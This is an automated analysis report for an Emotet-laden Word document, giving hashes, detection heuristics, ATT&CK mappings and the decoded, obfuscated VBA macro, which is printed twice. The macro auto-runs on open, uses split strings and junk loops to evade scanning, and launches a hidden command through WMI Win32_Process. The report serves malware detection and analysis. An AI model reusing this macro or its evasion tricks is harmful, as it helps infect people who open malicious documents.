Emotet Office (OLE) malware analysis — malicious · c4b26c40d3f68ea4

MALICIOUS

Office (OLE)

139.4 KB Created: 2019-05-07 07:58:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: 21871221e4d2cca916266146762f76e0 SHA-1: 65a131b24189bc3922338ff6e6485fb1483a28d3 SHA-256: c4b26c40d3f68ea49a6f012cf5235cd50c84bb1c8edd54da39463137551fd24a

342 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing a VBA macro. The macro utilizes a GetObject call and the reassembled string 'winmgmts' to interact with WMI's Win32_Process, indicating an intent to launch a new process. This is a common technique for downloading and executing further malicious payloads, consistent with Emotet's behavior.

Heuristics 9

ClamAV: Doc.Downloader.Emotet-6964108-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6964108-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4800 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4800 bytes
SHA-256: `758b33e01d7b388ef6216704e9235227ebe9de75c0a17d93cf8a4f0cba3633a9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "q94880_" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "D_38597" Attribute VB_Base = "0{27B995DF-403D-48C8-AE43-878587D23585}{03D958B9-CEAC-4734-8AAC-22D8F2A2903B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "w353043" Attribute VB_Name = "z29185_0" Attribute VB_Name = "d971908" Attribute VB_Base = "0{A33B4EB7-C64E-4CE1-9246-32D7713857B3}{DB8EB4B6-0FA0-41EC-8CFF-E4DD38D28303}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "t_9930" Function I0_1319(v_42512) While u897576 And F0104542 'a467519R352588p07532I2_7138 Wend While b07956 And O9956_ 'L40_23Y76072k__4671i60110 Wend While w91_758 And D07_528 'm214710S83371n540262G_44531 Wend Set I0_1319 = CVar(v_42512) While v397012 And M4_443 'U5_70_4A72_7013r6114172q258580 Wend While O2075_8 And B578067 'V5903551v_6_081u64_178f3972_82 Wend While X_23745 And t85239 'K7514817t7353_1L_089_9t524_2 Wend End Function Sub _ autoopen() On Error Resume Next While T051943 And f9600_1 'Y40485_q39275N15_7050w001_110 Wend While B755190 And n5592371 'Y132522_U159813S07057_W880_0 Wend Call q82423 While o522_4 And I0_0308_ 'P_0_6144t__90214Q642640u47758_5 Wend While z4337905 And R7_250 'm38688_t8472960w835168B6102_0 Wend While t75837 And h5420434 'i4996433Q8886202p7522749d_61_24 Wend End Sub Attribute VB_Name = "j632218" Function q82423() On Error Resume Next While d7322091 And k97_9106 'S93752P8969762v_43955Y989272 Wend While w32_2613 And K39_00_ 'h6_309w8227_5X31161_Q040__ Wend E9_410_ = D_38597.C722737 + d971908.H529224 + D_38597.C722737.ControlSource + d971908.d38691 + D_38597.C722737.ControlSource + D_38597.C722737.ControlTipText + d971908.S64_9_8 + D_38597.C722737.PasswordChar + D_38597.C722737.ControlSource + d971908.L479875 + D_38597.C722737.ControlTipText + d971908.S7433952 + D_38597.C722737.ControlSource While M97566 And E1445980 'm7773410w18196F_3519E0_04417 Wend While Z__39771 And B4_5201 'v904600A7_933s4931_3z2868420 Wend Set Y187098 = I0_1319(GetObject("winmgmt" + "s:Wi" + "n3" + "2_Pr" + "ocess")) While R05145 And Z4_669 'J819_93_z88049Z66044D2_071_ Wend While a650797 And U75976 'W55311s403363a_2752C047007 Wend Y187098.Create S4555748 + E9_410_ + L__45617, C327136, J079245, Y3128080 While N4_825_ And m_2745_ 'J0668502H409_179q39_562O2__979 Wend While Q6__7125 And X891124 'Z6_67243M94648X_6266s_3368 Wend End Function Attribute VB_Name = "a0_9172" Public Function J079245() While a092875 And r0439716 'w2273398h041231K52_68o84_4_ Wend While L37_63_ And c95804 'C689038n21_3801w22495_9D_1768 Wend While B7057436 And t64560 'S675539X1405_2j2_8524s0_07206 Wend Set J079245 = I0_1319(GetObject("winmgmt" + "s:Wi" + "n3" + "2_Pr" + "ocess" + "S" + "tartup")) While Y2_91900 And c2804_9 'b32_249K2220_3_T505804w32_8_6 Wend While z520409 And z5261929 'u238692l651669M70682X51619 Wend While m_119023 And t41488_ 'G927896r677468_P308137Z83763 Wend t910_82 = vbError - vbError While R504540 And P1_3845 'J35645V7757_1K439_4_5X6099325 Wend While m9480144 And I7880129 'n89915L310545O ... (truncated)

SHA-256: 758b33e01d7b388ef6216704e9235227ebe9de75c0a17d93cf8a4f0cba3633a9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "q94880_"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "D_38597"
Attribute VB_Base = "0{27B995DF-403D-48C8-AE43-878587D23585}{03D958B9-CEAC-4734-8AAC-22D8F2A2903B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "w353043"

Attribute VB_Name = "z29185_0"

Attribute VB_Name = "d971908"
Attribute VB_Base = "0{A33B4EB7-C64E-4CE1-9246-32D7713857B3}{DB8EB4B6-0FA0-41EC-8CFF-E4DD38D28303}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "t_9930"
Function I0_1319(v_42512)
         While u897576 And F0104542
'a467519R352588p07532I2_7138
      Wend
         While b07956 And O9956_
'L40_23Y76072k__4671i60110
      Wend
         While w91_758 And D07_528
'm214710S83371n540262G_44531
      Wend
Set I0_1319 = CVar(v_42512)
         While v397012 And M4_443
'U5_70_4A72_7013r6114172q258580
      Wend
         While O2075_8 And B578067
'V5903551v_6_081u64_178f3972_82
      Wend
         While X_23745 And t85239
'K7514817t7353_1L_089_9t524_2
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While T051943 And f9600_1
'Y40485_q39275N15_7050w001_110
      Wend
         While B755190 And n5592371
'Y132522_U159813S07057_W880_0
      Wend
Call q82423
         While o522_4 And I0_0308_
'P_0_6144t__90214Q642640u47758_5
      Wend
         While z4337905 And R7_250
'm38688_t8472960w835168B6102_0
      Wend
         While t75837 And h5420434
'i4996433Q8886202p7522749d_61_24
      Wend
End Sub


Attribute VB_Name = "j632218"
Function q82423()
On Error Resume Next
         While d7322091 And k97_9106
'S93752P8969762v_43955Y989272
      Wend
         While w32_2613 And K39_00_
'h6_309w8227_5X31161_Q040__
      Wend
E9_410_ = D_38597.C722737 + d971908.H529224 + D_38597.C722737.ControlSource + d971908.d38691 + D_38597.C722737.ControlSource + D_38597.C722737.ControlTipText + d971908.S64_9_8 + D_38597.C722737.PasswordChar + D_38597.C722737.ControlSource + d971908.L479875 + D_38597.C722737.ControlTipText + d971908.S7433952 + D_38597.C722737.ControlSource
         While M97566 And E1445980
'm7773410w18196F_3519E0_04417
      Wend
         While Z__39771 And B4_5201
'v904600A7_933s4931_3z2868420
      Wend
Set Y187098 = I0_1319(GetObject("winmgmt" + "s:Wi" + "n3" + "2_Pr" + "ocess"))
         While R05145 And Z4_669
'J819_93_z88049Z66044D2_071_
      Wend
         While a650797 And U75976
'W55311s403363a_2752C047007
      Wend
Y187098.Create S4555748 + E9_410_ + L__45617, C327136, J079245, Y3128080
         While N4_825_ And m_2745_
'J0668502H409_179q39_562O2__979
      Wend
         While Q6__7125 And X891124
'Z6_67243M94648X_6266s_3368
      Wend
End Function

Attribute VB_Name = "a0_9172"

Public Function J079245()
         While a092875 And r0439716
'w2273398h041231K52_68o84_4_
      Wend
         While L37_63_ And c95804
'C689038n21_3801w22495_9D_1768
      Wend
         While B7057436 And t64560
'S675539X1405_2j2_8524s0_07206
      Wend
Set J079245 = I0_1319(GetObject("winmgmt" + "s:Wi" + "n3" + "2_Pr" + "ocess" + "S" + "tartup"))
         While Y2_91900 And c2804_9
'b32_249K2220_3_T505804w32_8_6
      Wend
         While z520409 And z5261929
'u238692l651669M70682X51619
      Wend
         While m_119023 And t41488_
'G927896r677468_P308137Z83763
      Wend
t910_82 = vbError - vbError
         While R504540 And P1_3845
'J35645V7757_1K439_4_5X6099325
      Wend
         While m9480144 And I7880129
'n89915L310545O
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.